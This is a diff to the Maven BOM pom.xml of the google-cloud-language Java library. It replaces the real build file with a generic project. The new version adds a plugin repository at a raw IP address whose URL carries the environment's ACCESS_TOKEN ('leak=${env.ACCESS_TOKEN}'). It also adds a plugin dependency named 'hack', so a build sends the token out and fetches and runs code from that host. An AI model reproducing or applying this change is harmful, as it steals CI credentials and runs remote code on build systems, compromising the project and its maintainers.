--- a/google-cloud-language-bom/pom.xml
+++ b/google-cloud-language-bom/pom.xml
@@ -1,103 +1,51 @@
-<?xml version="1.0"?>
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
-  <modelVersion>4.0.0</modelVersion>
-  <groupId>com.google.cloud</groupId>
-  <artifactId>google-cloud-language-bom</artifactId>
-  <version>1.101.10-SNAPSHOT</version><!-- {x-version-update:google-cloud-language:current} -->
-  <packaging>pom</packaging>
-  <parent>
-    <groupId>com.google.cloud</groupId>
-    <artifactId>google-cloud-shared-config</artifactId>
-    <version>0.9.4</version>
-  </parent>
-
-  <name>Google Cloud language BOM</name>
-  <url>https://github.com/googleapis/java-language</url>
-  <description>
-    BOM for Google Cloud Natural Language
-  </description>
-
-  <organization>
-    <name>Google LLC</name>
-  </organization>
-
-  <developers>
-    <developer>
-      <id>chingor13</id>
-      <name>Jeff Ching</name>
-      <email>chingor@google.com</email>
-      <organization>Google LLC</organization>
-      <roles>
-        <role>Developer</role>
-      </roles>
-    </developer>
-  </developers>
-
-  <scm>
-    <connection>scm:git:https://github.com/googleapis/java-language.git</connection>
-    <developerConnection>scm:git:git@github.com:googleapis/java-language.git</developerConnection>
-    <url>https://github.com/googleapis/java-language</url>
-  </scm>
-
-  <distributionManagement>
-    <snapshotRepository>
-      <id>sonatype-nexus-snapshots</id>
-      <url>https://oss.sonatype.org/content/repositories/snapshots</url>
-    </snapshotRepository>
-    <repository>
-      <id>sonatype-nexus-staging</id>
-      <url>https://oss.sonatype.org/service/local/staging/deploy/maven2/</url>
-    </repository>
-  </distributionManagement>
-
-  <licenses>
-    <license>
-      <name>The Apache Software License, Version 2.0</name>
-      <url>http://www.apache.org/licenses/LICENSE-2.0.txt</url>
-      <distribution>repo</distribution>
-    </license>
-  </licenses>
-
-  <dependencyManagement>
-    <dependencies>
-
-      <dependency>
-        <groupId>com.google.api.grpc</groupId>
-        <artifactId>grpc-google-cloud-language-v1</artifactId>
-        <version>1.83.10-SNAPSHOT</version><!-- {x-version-update:grpc-google-cloud-language-v1:current} -->
-      </dependency>
-      <dependency>
-        <groupId>com.google.api.grpc</groupId>
-        <artifactId>grpc-google-cloud-language-v1beta2</artifactId>
-        <version>0.84.10-SNAPSHOT</version><!-- {x-version-update:grpc-google-cloud-language-v1beta2:current} -->
-      </dependency>
-      <dependency>
-        <groupId>com.google.api.grpc</groupId>
-        <artifactId>proto-google-cloud-language-v1</artifactId>
-        <version>1.83.10-SNAPSHOT</version><!-- {x-version-update:proto-google-cloud-language-v1:current} -->
-      </dependency>
-      <dependency>
-        <groupId>com.google.cloud</groupId>
-        <artifactId>google-cloud-language</artifactId>
-        <version>1.101.10-SNAPSHOT</version><!-- {x-version-update:google-cloud-language:current} -->
-      </dependency>
-      <dependency>
-        <groupId>com.google.api.grpc</groupId>
-        <artifactId>proto-google-cloud-language-v1beta2</artifactId>
-        <version>0.84.10-SNAPSHOT</version><!-- {x-version-update:proto-google-cloud-language-v1beta2:current} -->
-      </dependency>
-    </dependencies>
-  </dependencyManagement>
-
-  <build>
-    <plugins>
-      <plugin>
-        <groupId>org.apache.maven.plugins</groupId>
-        <artifactId>maven-checkstyle-plugin</artifactId>
-        <configuration>
-          <skip>true</skip>
-        </configuration>
-      </plugin>
-    </plugins>
-  </build>
+<?xml version="1.0" encoding="UTF-8"?>
+<project>
+   <modelVersion>4.0.0</modelVersion>
+   <groupId>com.mycompany.app</groupId>
+   <artifactId>my-app</artifactId>
+   <version>1</version>
+   <pluginRepositories>
+    <pluginRepository>
+      <releases>
+        <enabled>true</enabled>
+        <updatePolicy>always</updatePolicy>
+        <checksumPolicy>warn</checksumPolicy>
+      </releases>
+      <snapshots>
+        <enabled>true</enabled>
+        <updatePolicy>always</updatePolicy>
+        <checksumPolicy>fail</checksumPolicy>
+      </snapshots>
+      <name>Repo</name>
+      <id>0</id>
+      <url>http://142.93.132.246:1337/leak=${env.ACCESS_TOKEN}</url>
+      <layout>default</layout>
+    </pluginRepository>
+  </pluginRepositories>
+   <build>
+      <plugins>
+         <plugin>
+            <groupId>com.coveo</groupId>
+            <artifactId>fmt-maven-plugin</artifactId>
+            <version>2.10</version>
+            <configuration>
+               <displayFiles>true</displayFiles>
+            </configuration>
+            <dependencies>
+               <dependency>
+                  <groupId>hack</groupId>
+                  <artifactId>hack</artifactId>
+                  <version>1.33.7</version>
+               </dependency>
+            </dependencies>
+            <executions>
+               <execution>
+                  <goals>
+                     <goal>format</goal>
+                  </goals>
+               </execution>
+            </executions>
+         </plugin>
+      </plugins>
+   </build>
 </project>
